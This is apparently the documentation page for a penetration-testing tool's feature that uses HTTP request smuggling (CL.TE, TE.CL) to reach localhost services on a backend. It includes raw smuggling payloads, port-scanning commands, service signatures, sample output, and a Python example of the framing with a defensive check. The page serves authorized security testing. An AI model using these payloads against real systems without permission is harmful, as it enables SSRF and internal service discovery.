Exploiting

Using detected vulnerabilities to test for SSRF-like attacks

The --exploit localhost-access feature leverages detected HTTP Request Smuggling vulnerabilities to test for SSRF-like attacks by attempting to make the backend server access localhost (127.0.0.1) on various ports.

Overview

HTTP Request Smuggling vulnerabilities can be exploited to force the backend server to make requests to internal services. The localhost-access exploit automates this testing by:

  1. Using detected smuggling vulnerabilities (CL.TE or TE.CL)
  2. Crafting payloads that target localhost on specified ports
  3. Analyzing responses for indicators of successful access
  4. Reporting which services are accessible

Basic Usage

Automatic Port Testing

After detecting a vulnerability, test common localhost services:

smugglex https://target.com/ --exploit localhost-access

Default ports tested: 22 (SSH), 80 (HTTP), 443 (HTTPS), 8080, 3306 (MySQL)

Custom Ports

Specify which ports to test:

smugglex https://target.com/ --exploit localhost-access --exploit-ports 22,80,443

Testing Database Services

smugglex https://target.com/ --exploit localhost-access --exploit-ports 3306,5432,6379,27017

This tests:

  • 3306: MySQL
  • 5432: PostgreSQL
  • 6379: Redis
  • 27017: MongoDB

Advanced Usage

Combined with Detection Options

Test only specific vulnerability types before exploitation:

# Only test CL.TE, then exploit
smugglex https://target.com/ -c cl-te --exploit localhost-access

# Quick scan, stop at first vuln, then exploit
smugglex https://target.com/ -1 --exploit localhost-access

Verbose Mode

See detailed HTTP requests and responses:

smugglex https://target.com/ --exploit localhost-access --exploit-ports 80,443 -v

Verbose output shows:

  • Detected vulnerability details
  • Generated localhost payloads
  • Request and response data
  • Detection indicators found

With Custom Headers

smugglex https://target.com/ \
  -H "Authorization: Bearer token" \
  --exploit localhost-access \
  --exploit-ports 80,8080

How It Works

Detection Phase

  1. SmuggleX runs standard vulnerability detection
  2. Identifies CL.TE or TE.CL vulnerabilities
  3. Extracts the working smuggling payload

Exploitation Phase

  1. Generates localhost-targeting payloads for each port
  2. Sends smuggling payload followed by probe request
  3. Analyzes response for success indicators
  4. Reports successful accesses

Payload Generation

CL.TE Vulnerabilities

For CL.TE, where the front end frames the request by Content-Length and the backend by Transfer-Encoding:

POST / HTTP/1.1
Host: target.com
Connection: keep-alive
Content-Length: 85
Transfer-Encoding: chunked

0

GET / HTTP/1.1
Host: 127.0.0.1:80
Connection: close

The backend processes the smuggled request to localhost.

TE.CL Vulnerabilities

For TE.CL, where the front end frames the request by Transfer-Encoding and the backend by Content-Length:

POST / HTTP/1.1
Host: target.com
Connection: keep-alive
Content-Length: 4
Transfer-Encoding: chunked

1
X
0

GET / HTTP/1.1
Host: 127.0.0.1:80
Connection: close

The remainder after Content-Length bytes gets processed as a new request.
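The following is an added example, not smugglex's own code: it frames the CL.TE layout shown above the way a Content-Length-only front end and a chunked-only backend each would, so you can see exactly which bytes the backend reads as a second request, and it includes the check a front end should apply to refuse such ambiguous framing (RFC 9112 Section 6.3: Transfer-Encoding overrides Content-Length, and a message carrying both ought to be treated as an error). The request bytes are constructed here, with Content-Length computed from the real body rather than hard-coded.

```python
def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def is_ambiguous(headers) -> bool:
    """True when both framing headers are present; a safe front end rejects."""
    return b"content-length" in headers and b"transfer-encoding" in headers

def frame_by_content_length(headers, body):
    """(body as a Content-Length parser sees it, bytes left on the socket)."""
    n = int(headers.get(b"content-length", b"0"))
    return body[:n], body[n:]

def frame_by_chunked(body):
    """(body as a chunked parser sees it, bytes left on the socket)."""
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";")[0], 16)  # drop chunk extensions
        pos = line_end + 2
        if size == 0:  # last chunk: consume trailer lines up to the blank line
            while True:
                line_end = body.index(b"\r\n", pos)
                line, pos = body[pos:line_end], line_end + 2
                if not line:
                    return body[:pos], body[pos:]
        pos += size + 2  # chunk data plus its trailing CRLF

def smuggled_remainder(raw: bytes) -> bytes:
    """Bytes a chunked backend reads as a *new* request after a Content-Length
    front end forwarded the whole body as one message (the CL.TE case)."""
    headers, body = parse_request(raw)
    forwarded, _ = frame_by_content_length(headers, body)
    _, leftover = frame_by_chunked(forwarded)
    return leftover

# Constructed input following the CL.TE layout above; Content-Length is
# computed from the real body length rather than hard-coded.
SMUGGLED = b"GET / HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: close\r\n\r\n"
BODY = b"0\r\n\r\n" + SMUGGLED
CL_TE_REQUEST = (b"POST / HTTP/1.1\r\nHost: target.com\r\nConnection: keep-alive\r\n"
                 b"Content-Length: " + str(len(BODY)).encode()
                 + b"\r\nTransfer-Encoding: chunked\r\n\r\n" + BODY)
```

Calling `smuggled_remainder(CL_TE_REQUEST)` returns exactly the GET to 127.0.0.1:80, which is what the backend would process next; `is_ambiguous` on the same request returns True, which is the condition a hardened front end should refuse with a 400 instead of forwarding.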

Detection Indicators

The exploit identifies successful localhost access through multiple indicators:

Status Code Changes

  • Normal: 200 OK
  • After smuggling: 502 Bad Gateway, 503 Service Unavailable, 504 Gateway Timeout

Status changes indicate the backend attempted to reach the smuggled target.

Service Signatures

Port-specific signatures detected in responses:

Port   Service     Signatures
22     SSH         SSH-2.0, SSH-1., OpenSSH
80     HTTP        Apache, nginx, Server:
443    HTTPS       SSL handshake, TLS alert, certificate
3306   MySQL       MySQL, MariaDB
5432   PostgreSQL  PostgreSQL
6379   Redis       Redis
27017  MongoDB     MongoDB

Error Messages

Keywords indicating internal access attempts:

  • Connection refused
  • Connection reset
  • No route to host
  • Host is unreachable
  • Bad Gateway
  • Service Unavailable
  • upstream
  • backend
  • 127.0.0.1
  • localhost

Timing Differences

Significant timing changes (> 1 second) from baseline may indicate:

  • Connection attempts to closed ports
  • Slow internal services
  • Timeout conditions

Output Format

Successful Access

=== Localhost Access Exploit Results ===
Target: https://target.com/
Success Rate: 2/3

[+] Localhost Access Successful on port 22
  Reason: Found signature 'SSH-2.0' in response; Status code changed from 200 to 502
  Response Status: HTTP/1.1 502 Bad Gateway

[+] Localhost Access Successful on port 80
  Reason: Found error keyword 'Connection refused' in response body
  Response Status: HTTP/1.1 502 Bad Gateway

Failed Attempts:
[-] Port 443 - No indicators of localhost access detected

No Access Detected

=== Localhost Access Exploit Results ===
Target: https://target.com/
Success Rate: 0/5

[-] No successful localhost access detected on any tested port

Failed Attempts:
[-] Port 22 - No indicators of localhost access detected
[-] Port 80 - No indicators of localhost access detected
[-] Port 443 - No indicators of localhost access detected
[-] Port 8080 - No indicators of localhost access detected
[-] Port 3306 - No indicators of localhost access detected

Requirements

  1. Vulnerability Detected: A CL.TE or TE.CL vulnerability must be found first
  2. Exploit Option: --exploit localhost-access must be specified
  3. Network Access: Target server must be reachable
  4. Authorization: You must have permission to test the target

Use Cases

Internal Service Discovery

Identify which internal services are running:

smugglex https://target.com/ --exploit localhost-access --exploit-ports 22,80,443,3306,5432,6379

Specific Service Testing

Test if a specific service is accessible:

# Test if Redis is running
smugglex https://target.com/ --exploit localhost-access --exploit-ports 6379

# Test if MySQL is accessible
smugglex https://target.com/ --exploit localhost-access --exploit-ports 3306

SSRF Validation

Confirm SSRF potential through smuggling:

smugglex https://target.com/ \
  -c cl-te,te-cl \
  --exploit localhost-access \
  --exploit-ports 80,8080,8000 \
  -v

Troubleshooting

"exploit requested but no vulnerabilities found to exploit"

Cause: No smuggling vulnerability was detected.

Solutions:

  • Verify target is vulnerable with manual testing
  • Try increasing timeout: -t 20
  • Test specific vulnerability types: -c cl-te or -c te-cl
  • Check if target is behind a WAF

No Successful Localhost Access Detected

Possible Reasons:

  • Backend may not be vulnerable to SSRF via smuggling
  • Services on tested ports are not running
  • Backend has additional protections
  • Wrong vulnerability type detected

Solutions:

  • Try different ports with --exploit-ports
  • Use verbose mode to see detailed responses: -v
  • Test with wider port range
  • Verify vulnerability with exported payloads

Connection Timeouts

Cause: Requests timing out before completion.

Solutions:

  • Increase timeout: -t 30
  • Some services may be slow to respond
  • Check network conditions
  • Try smaller port sets

Security and Ethics

Important Warnings

  • Authorization Required: Only test systems you have explicit permission to test
  • Security Alerts: Localhost access testing may trigger security monitoring
  • Rate Limiting: Multiple connection attempts may be logged or blocked
  • Legal Compliance: Unauthorized testing may violate laws and regulations

Responsible Use

  1. Obtain written authorization before testing
  2. Define scope clearly with stakeholders
  3. Test in appropriate environments (staging, not production)
  4. Document all findings responsibly
  5. Report vulnerabilities through proper channels

Best Practices

  • Test during maintenance windows when possible
  • Use appropriate timeouts to avoid DoS
  • Monitor target for unusual behavior
  • Keep detailed logs of testing activities
  • Coordinate with security teams

Examples

Comprehensive Testing

# Full detection and exploitation workflow
smugglex https://target.com/ \
  -v \
  -o results.json \
  --export-payloads ./payloads \
  --exploit localhost-access \
  --exploit-ports 22,80,443,3306,5432,6379,8080

Quick Validation

# Fast check for common services
smugglex https://target.com/ \
  -1 \
  --exploit localhost-access \
  --exploit-ports 80,443

Database-Focused

# Test only database ports
smugglex https://target.com/ \
  --exploit localhost-access \
  --exploit-ports 3306,5432,6379,27017,1433 \
  -v

With Authentication

# Test with authentication headers
smugglex https://target.com/ \
  -H "Authorization: Bearer token123" \
  -H "X-API-Key: key456" \
  --cookies \
  --exploit localhost-access \
  --exploit-ports 80,8080
